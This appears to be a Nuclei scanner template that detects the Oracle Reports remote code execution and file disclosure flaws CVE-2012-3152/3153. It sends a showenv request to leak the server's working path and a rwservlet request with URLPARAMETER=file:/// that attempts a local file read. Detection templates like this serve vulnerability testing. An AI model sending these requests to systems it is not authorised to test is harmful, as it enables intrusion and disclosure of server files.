id: CVE-2012-3153

info:
  name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
  author: Sid Ahmed MALAOUI @ Realistic Security
  severity: critical
  description: |
    An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
    11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
    vectors related to Report Server Component.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
    - https://www.exploit-db.com/exploits/31737
    - https://www.oracle.com/security-alerts/cpuoct2012.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
  classification:
    cve-id: CVE-2012-3153
  tags: cve,cve2012,oracle,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/reports/rwservlet/showenv"
      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"

    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Reports Servlet")'

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - '!contains(body_2, "<html")'
          - '!contains(body_2, "<HTML")'
        condition: and

    extractors:
      - type: regex
        name: windows_working_path
        regex:
          - ".?.?\\\\.*\\\\showenv"
      - type: regex
        name: linux_working_path
        regex:
          - "/.*/showenv"

# Enhanced by mp on 2022/02/21